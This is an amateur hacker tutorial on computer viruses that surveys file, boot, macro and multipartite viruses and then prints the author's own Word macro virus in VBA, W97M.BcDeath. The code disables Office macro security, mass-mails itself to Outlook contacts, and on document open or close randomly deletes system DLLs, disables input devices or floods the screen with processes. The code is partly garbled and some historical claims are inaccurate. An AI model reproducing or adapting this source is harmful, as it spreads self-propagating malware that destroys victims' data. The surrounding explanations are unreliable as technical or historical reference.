This is the second part of the virus tute my friend wrote it gets more into specifics and mine u at the bottom is the source code of an old obsolete virus...dont go screaming all crazy it is just there for the readers to understand how a virus works.....have a read

Intro To Viruses II: The Computer Killer
Made by Zcero
ICQ# 58805220

How can a Virus be so deadly if they are modern marvels? Thats easy,
The modern virus these days is made by a type of hacker that is
looked down apon in the comunity, they are known as black hat
hackers. Now most of you read intro to viruses part I and are
wondering why there is so much to such a small thing. Well, to tell you
the truth..I am overcomplicating things to make it easier when you
attemp to try it yourself. Anyway on to the txt.

Alright I ended with methods now its time to elaborate one file
infectors. There are two types, parasitic and overwriting. First I'll talk
about parasitic.
Parasitic viruses can attach themselves to either the front, back or
middle of a file. One it attaches it simply changes the name or size of
the file. It is easily detectable and removable.
The second type are overwriting virus...these are much more
dangerous than parasitic becuase they destroy valuable info on your
comp. They can also remove code and replace it with there own. They
often are very hard to find because they dont change the size of the

Alright here is a couple of examples of viruses

Lehigh Virus
This is one of the first file infector viruses EVER. It was made in 1987
at a college in pennsylvania. It infected a computers harddrive and
from there infected all the floppy that went in.

Boot Viruses
Every disk has a boot sector...if you dont know what one is read intro
to hacking 4. Boot viruses hide themselves and attack in the Boot
Sector. Once a Boot virus has control of your comp. it loads itself into
memory and then lets the boot sector take over again. These are the
hardest viruses to find and in my oppinion they are the biggest pain in
the ass. The boot sector is very small though its only about 512
bytes,..this is way to small for a boot virus to get into so once its in
your computer it breaks itself into parts. One part attacks the Boot the
other part Hides somewere else on the disk. Some Boot viruses that
are real good hide in empty space on the disk and label themselves
"bad sectors" so they cant be overwritten. BOOT VIRUSES CANNOT BE
TRANSFERED BY PHONE LINES!!! Only through floppy's. So if someone
is trying to tell you that he can give you a boot virus tell him "****

This virus was created in 1992 and was a modified version of stoned.
To date it has gone down as the most media popular viruses of all
time. But how could a boot virus be spread so fast? You said it couldn't
be spread by phone? Zcero, you're losing me...! Alright, easily
explained, Leading edge (big com. comp.) accidentally shipped
hundreds of computers with the virus. The media overheard and
jumped on the story like only they could and told everone that millions
of computers would crash on Friday. Friday came and went though and
with exception of a few hundred...nothing happened. In the end the
media was wrong, leading edge was safe and norton etc was rich.
Multipartite viruses.
These are basically just a combo between file infecting and boot
viruses. They were the one of the new breeds for dos hackers

Macro Viruses
These came shortly after the multipartite virus, they can only infect
files created by another program, you might think that sucks but, at
the time they rained supreme over the rest. They infect templates that
define margins, fonts and general info. Every time you create the
macro virus infects and infects again.

The 90's brought a new Os that gave us something rarely seen, GUI. It
was known as Windows 95,..and it would change the future of
computers. Windows would make bill gates billions and would get
steve jobbs fired only to be rehired in the late 90's. Windows to say
the least changed the playing ground for everyone...and left dos virii
creaters in the dust. It wouldn't take long though before windows got

Boza virus
This is the first virus ever to spread under windows 95. It was made
by Austrailian's and was made to attack .exe files. The virus had a bug
though making it virtual useless.

Cruise Viruses
These get their name from the cruise missle not tom. These viruses
are able to hit there target and slip away with a pass or someother
type of important data undetected.

Whether a virus is goof or bad is up to you...they say that a virus can
never be good, I tend to disagree, and because of viruses your
computer is more secure. Whether you like them or not they are real
and if you don't understand them they will become a threat to you and
your computer. In intro to viruses 3, I will talk about prevention and
Below is source code for Bcdeath...its short, outdated, and useless but
still a virus. The code is live if inputted so don't be stupid. This code is
perfect for you to study from as a beginner hacker/coder. I do not
support Black Hat or any of there motives but I do see the purpose of
viruses therefore that is why I'm teaching you how to use them and
how they work. DO NOT **** ME OVER...I only help brothers and
sisters of our causes and if you **** me then you are not part of our
cause but part of another. Just remember what your mom taught you
when she said, "play nice".
Private Declare Function SendMessage Lib "user32"
Alias "SendMessageA" _ (ByVal hWnd As Long, ByVal wMsg As Long,
ByVal wParam As Long, _
ByVal lParam As Long) As Long
Private Const WM_SYSCOMMAND = &H112&
Private Const SC_MONITORPOWER = &HF170&
Private Sub Document_open()
On Error Resume Next
If System.PrivateProfileString
("", "HKEY_CURRENT_USER\SoftwareMicrosoftOffice9.0
\WordSecurity", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
"Level") = 1&
Else CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection
= (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim DeMoNiCOutlook, GRaVeName, SaTaN
Set DeMoNiCOutlook = CreateObject("Outlook.Application")
Set GRaVeName = DeMoNiCOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString
("", "HKEY_CURRENT_USER\SoftwareMicrosoftOffice", "BcDeath?") <>
"by Zcero" Then
If DeMoNiCOutlook = "Outlook" Then
GRaVeName.Logon "profile", "password"
For y = 1 To GRaVeName.AddressLists.Count
Set AddyBook = GRaVeName.AddressLists(y)
x = 1
Set SaTaN = DeMoNiCOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
SaTaN.Recipients.Add Peep
x = x + 1
If x > 45 Then oo = AddyBook.AddressEntries.Count
Next oo
SaTaN.Subject = "Check this **** out! "
SaTaN.Body = "Read this story, its cool as hell"
SaTaN.Attachments.Add ActiveDocument.FullName
Peep = ""
Next y
End If
("", "HKEY_CURRENT_USER\SoftwareMicrosoftOffice", "BcDeath?") =
"by Zcero"
End If
Sub AutoOpen()
Call Nukeit
End Sub
Sub AutoClose()
Call Nukeit
End Sub

End If
Function Nukeit()
Check\\$ = Dir("C:WindowsSystemDemonicHaxor-is-MyMaster.sys")
If Check\\$ = "DemonicHaxor-is-MyMaster.sys" Then Exit Function
Randomize Timer
x = Int(Rnd(1) * 10) + 1
If x = 1 Then
Shell "rundll32 user,swapmousebutton"
End If
If x = 2 Then
Shell "rundll32 keyboard,disable"
Shell "rundll32 mouse,disable"
End If
If x = 3 Then
Dim Ret As Long
End If
If x = 4 Then
Shell "rundll32 krnl386.exe,exitkernel"
End If
If x = 5 Then
Shell "rundll32 user,disableoemlayer"
End If
If x = 6 Then
Do While z <> 1000
s = Shell("notepad.exe", vbNormalFocus)
s = Shell("ping.exe", vbNormalFocus)
s = Shell("tracert.exe", vbNormalFocus)
s = Shell("calc.exe", vbNormalFocus)
s = Shell("charmap.exe", vbNormalFocus)
s = Shell("pbrush.exe", vbNormalFocus)
s = Shell("write.exe", vbNormalFocus)
z = z + 1
End If
If x = 7 Then
Kill"C:\ Windows\System\*.dll
End If
If x = 8 Then
Open "C:\ windows\Control.ini" For Append As #1
Seek #1, 0
Print #1, "[Screen Saver.3DText]"
Print #1, "DemoType = 0"
Print #1, "RotStyle = 3"
Print #1, "Tesselation = 100"
Print #1, "Size = 100"
Print #1, "Speed = 100"
Print #1, "SurfStyle = 0"
Print #1, "Font = Comic Sans MS"
Print #1, "FontAttributes = 0"
Print #1, "Charset = 0"
Print #1, "Text = W97M.BcDeath"
Print #1, "Texture = None"
Print #1, "TextureFileOffset = 3"
Close #1
End If
If x = 9 Then
Open "C:\ windows\import.exe" For Append As #1
Print #1, "W2K.BcDeath by ~Zcero~"
Print #1, "Woah, this must suck to know... the fact that
you have a virii on your comp!"
Close #1
End If
If x = 10 Then
Open "C:\ autoexec.bat" For Append As #1
Print #1, "@echo Bet you wished you learned more about us!"
Close #1
End If
If X = 11 Then
Open "C:\ AutoExec.bat" For Append As #1
Print #1, "@echo ~Zcero~"
Close #1
End If
End Function